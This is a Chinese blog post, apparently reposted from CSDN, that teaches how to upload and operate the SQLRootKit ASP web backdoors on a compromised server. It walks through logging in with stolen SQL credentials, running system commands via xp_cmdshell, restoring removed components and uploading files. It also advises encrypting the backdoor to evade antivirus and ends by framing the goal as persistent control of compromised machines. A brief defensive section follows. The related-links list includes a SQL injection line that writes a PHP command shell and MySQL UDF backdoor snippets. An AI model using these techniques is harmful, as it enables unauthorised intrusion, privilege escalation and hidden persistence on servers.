使用SQLRootKit网页数据库后门控制案例

最新推荐文章于 2023-10-24 17:44:18 发布
最新推荐文章于 2023-10-24 17:44:18 发布
阅读量118 收藏
点赞数
文章标签: 数据库 php 操作系统
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_34059951/article/details/85181485
版权

使用SQLRootKit网页数据库后门控制案例

Simeon
通过本案例可以学习到:
1)了解网页数据库后门SQLRootKit等方面的知识
2)使用SQLRootKit 1.0以及SQLRootKit 3.0数据库后门来控制计算机
SQLRootKit是一种网页脚本来执行数据库命令,前提是需要知道数据库的账号名称和密码,SQLRootKit目前有两种,一种是针对php语言的,其针对数据库为Mysql;另外一种是针对asp语言的,asp版本的SQLRootKit有两个版本即1.0版和改进后的3.0版本,主要是针对SQL Server。本案例主要介绍如何通过使用SQLRootKit 1.0以及SQLRootKit 3.0数据库后门来控制计算机。
1.使用SQLRootKit 1.0网页后门控制计算机
<?xml:namespace prefix = v ns = "urn:schemas-microsoft-com:vml" /><?xml:namespace prefix = o ns = "urn:schemas-microsoft-com:office:office" />(1)  使用SQLRootKit 1.0控制计算机。在获取网站的数据库的类型、数据库用户密码和用户名称后,直接将SQLRootKit.asp文件上传到网站目录中,然后在浏览器中输入地址打开即可使用。打开后,在分别在“SQL用户名”和“SQL密码”中输入获取的SQL用户名“sa”和密码“***”,然后在执行命令前面的输入框中输入需要执行的命令,例如输入“net user”查看系统中的所有用户,输入完毕后,单击“执行命令”后,则会在该网页中显示执行结果,如图1所示。
1SQLRootKit1.0中执行命令

& 说明
1)目前很多杀毒软件都会对SQLRootKit1.0网页***进行查杀,因此在使用前最好使用一些网页加密软件进行加密。

2SQLRootKit1.0中只能利用本地的SQL Server数据库来执行命令,如果数据库服务器跟Web服务器不在同一台计算机上,则SQLRootKit1.0无能为力。

3)使用经过加密的SQLRootKit 1.0网页***,其Webshell相当于一个DOSShell,如果未在数据库服务器中删除一些比较危险的dll组件,则该后门可以长期存在。
2.使用SQLRootKit 3.0网页后门控制计算机
(1) 直接运行SQLRootKit 3.0网页后门程序,将SQLRootKit 3.0网页后门直接上传到网站目录,然后在浏览器中输入其对应地址即可,运行界面如图2所示。
2 运行SQLRootKit 3.0网页后门
& 说明
1)在SQLRootKit 3.0网页后门中,需要输入“SQL用户名”、“SQL密码”、“SQL服务器”以及“SQL端口”,程序默认SQL Server服务器跟Web服务器在同一台计算机上。
2输入“SQL用户名”、“SQL密码”、“SQL服务器”以及“SQL端口”验证正确后才能进行后续操作。

(2)  登录SQLRootKit 3.0网页后门,输入相应的“SQL用户名”和“SQL密码”密码后,单击“Login”按钮,验证正确后进入SQLRootKit 3.0网页后门管理界面,如图3所示。

3 进入SQLRootKit 3.0网页后门管理界面
(3) 检测组件。单击“检测组件”按钮,程序会自动检测服务器上是否存在XP_cmdshellsp_oacreateXp_regwrite以及xp_servicecontrol这四个SQL组件,检测操作系统版本以及执行权限等信息,并显示在该页面上,如图4所示。

4 检测SQL组件

& 说明
如果检测出来的组件被系统管理员删除了,则可以单击“恢复组件”按钮进行组件恢复。

(4) 执行命令。在“系统命令”中输入需要执行的命令,并选择运行程序的相应组件。在本例中选择“利用XP_cmdshell扩展”,并在系统命令中输入“net user”命令,然后单击“执行”按钮,其结果会显示在网页中,如图5所示。利用XP_cmdshell扩展命令在执行过程中可能会显示一些错误信息,可以不用管它。

5执行命令

(5) 上传文件。在SQLRootKit 3.0网页后门中提供了文件上传功能,即在“内容”中粘贴需要上传的文件的内容,在文件路径中输入需要保存的文件的物理路径,输入完毕后,单击“保存”按钮即完成上传文件。

安全防范措施

对于SQLRootKit 3.0网页后门来讲,其防范措施主要有:
1)勤杀毒,目前很多杀毒软件都能自动识别并查杀这些网页后门程序,因此平时要及时升级杀毒软件病毒库和开启杀毒软件的所有监管选项。
2)首次完成网站建设后,要保存网站所有文件的列表。例如可以在Dos下输入“dir  d:\网站目录\*.* >mywebsite20071218.txt”命令将网站所有文件生成列表文件mywebsite20071218.txt。每一次升级后都要再次生成文件列表,每一次维护时查看文件大小的变化即可。
3)使用一些网站监控软件进行实时监控。目前国外和国内都有一些网站文件监控软件,一点发现网站文件被改动,软件通过发送邮件或者发送手机短信等方式及时报警,方便管理员进行处理。
小结

本案例介绍了如何利用SQLRootKit 1.0以及SQLRootKit 3.0网页后门来控制计算机,在很多情况下,一般的网页后门程序或者网页***不能在服务器上执行命令,如果服务器上存在SQL Server服务器,并在获取了数据库用户和账号的情况下可以使用本案例介绍的方法来提升权限或者做留守后门,方便守控肉鸡。
weixin_34059951
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SqlRootKit v1.01-ASP源码.zip
12-13
RootKit是一种特殊的恶意软件,用于隐藏自身和其他恶意程序的存在,通常由黑客使用控制系统或服务器。SqlRootKit可能是为了帮助管理员检测和处理SQL相关的安全问题,尽管其名称可能引起误解。 ASP是微软开发的一...
数据库后门是什么?我们要如何预防它的危害
最新发布
dexunjiaqiang的博客
12-09 245
数据库后门是黑客在数据库中安装的一种特殊程序或代码,可以绕过正常的认证和授权机制,从而获取数据库的敏感信息或者控制整个数据库。黑客可以通过各种方式安装后门,比如利用漏洞、钓鱼、社会工程学等。
php简单后门实现及php连接数据库
qq_58683895的博客
10-24 963
包含php简单后门的实现代码及操作,以及php连接数据库的操作代码及介绍,和相关php函数的介绍
超浅谈web安全中的sql注入以及上传后门
fishermanmax的博客
10-30 3338
先上几道好吃的菜:firefox的hackbar工具。可以灵活的处理URL里的各种方式的加密解密。 硬菜:sqlmap 自动检测一个网站的各种可能存在的注入。-D 指定库 -T 指定表 -C 指定列 -dump-all全导出 (以下内容只在.php上面进行相应的测试,没有因为什么,因为我是只会PHP的菜鸟...) 一般的sql URL攻击步骤:  1、在index.php?
[译]使用sql创建后门
iteye_16188的博客
10-10 714
原文地址:http://resources.infosecinstitute.com/backdoor-sql-injection/ 在读本文之前应该参考http://resources.infosecinstitute.com/blind-sql-injection/ 本文的目的是通过sql注入漏洞来执行任意命令。为了运行OS命令,我们需要有一个命令行shell(CMD),或者运行允许我...
mysql 数据库后门,运用Mysql语句生成后门木马的具体方法
weixin_35460054的博客
03-17 823
通过Mysql 的语句生成后门木马的方法:SELECT * FROM `vbb_strikes` WHERE 1 union select2,3,0x3C3F7068702073797374656D28245F524551554553545B636D645D293B3F3Efrom vbb_strikes into outfile 'c:/inetpub/wwwroot/cmd.php'通过Mys...
Web Admin v2.0
06-18
4. SQLRootKit:这是一个集成的数据库管理工具,可能包括SQL查询、数据导入导出、数据库备份等功能。对于处理SQL Server数据库的网站,SQLRootKit可以作为一个强大的辅助工具。 5. Clone Time:这一特性可能是指...
mysql数据库后门_Mysql5 数据库后门代码!(经测试,灰常好用)
weixin_35664484的博客
01-19 250
DROP FUNCTION IF EXISTS lib_mysqludf_sys_info;DROP FUNCTION IF EXISTS sys_get;DROP FUNCTION IF EXISTS sys_set;DROP FUNCTION IF EXISTS sys_exec;DROP FUNCTION IF EXISTS sys_eval;CREATE FUNCTION lib_mysq...
Mysql5 数据库后门代码!(经测试,灰常好用)
weixin_34259232的博客
04-23 157
DROP FUNCTION IF EXISTS lib_mysqludf_sys_info; DROP FUNCTION IF EXISTS sys_get; DROP FUNCTION IF EXISTS...
SqlRootkit - by jnc
l0ng专栏
01-11 909
<!--if session("login")="" then response.write "no login" else response.write "login in"end if response.write "exit login"--><!--If r
nfine去后门版和数据库说明
04-30
nfine去后门版和数据库说明,节约程序员时间,去除60%业务代码编写
手工实战Rootkit木马.pdf
05-19
对象:普通大众用户 目的:解决大家在日常清除恶意程序时遇到的典型困难之一:恶意程序运行rootkit技术使用户无法打开一些比较主要的修复工具(非映像劫持技术, 且此技术对Wsycheck无效),也无法从普通的工具上看到系统运行的异常。一方面,希望此教程有肋于普通用户对Rootkit木马的了解,另[71.40]一 方面,也希望加强普通用户的动手能力和对修复工具的使用熟悉程度。所以在我们卡饭论坛的样本区里,选了一个比较合适的样本,做清除修复的典 型实例,以供大家参考,那么,下面我们就开始吧! 源于:卡饭安全论坛
Rootkit Unhooker
10-02
Rootkit Unhooker. SSDT shadow SSDT ring0 HOOK 不多说.用了就知道
ASP超强提权免杀珍藏版.rar
05-29
ASP超强提权免杀珍藏版.rar
SqlShell(Sql Server 扩展存储过程后门)
05-04
注:上传的部分不含源码,要下载源码的就不用下载了. 这个软件提供了一种Sql后门的思路.利用扩展存储过程来开放端口服务,并实现从sql server自启动,复用Sql Browser的1434端口,使得外界看起来出于一种无进程,无端口的状态. 具体利用方法,请查看帮助.
mysql 提权_Mysql提权留后门
weixin_33532301的博客
01-18 189
记录一次关于无聊时对基友MYSQL服务器的提权攻击。尽管没有完全攻击到对方,并且没有清理痕迹,但是,这里写写简单的防御方式。0x01.从无聊的nmap扫描开始今晚无聊时候,本想打开电脑扫下谁连进我wifi,无意间,眼睛一亮看到了一个惊喜。看到80端口,就有种冲动想要进去,进去后发现forbidden,然后试了试 phpmyadmin,发现直接进去,因为基友用的XAMPP集成环境,一下就猜到空密码。...
mysql后门
0ffs3t
02-07 759
Backdoors for Mysql by Vicente Díaz (vdiaz@edge-security.com) This document explores the possibility of creating backdoors for the last version of Mysql (5.1) using the same techniques present i
超级隐藏的MSSQL扩展后门
weixin_30718391的博客
08-17 235
鉴于现在管理员非常厉害,还会查隐藏帐户、还会查3389登陆日志、还会查Rootkit、还会查SQL LOG。真TMD BT。新发现一个后门非常隐藏---------------简单三步:1、将xplake2.dll复制到 Microsoft SQL server\mssql\binn目录2、运行如下命令: USE master EXEC sp_addextende...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值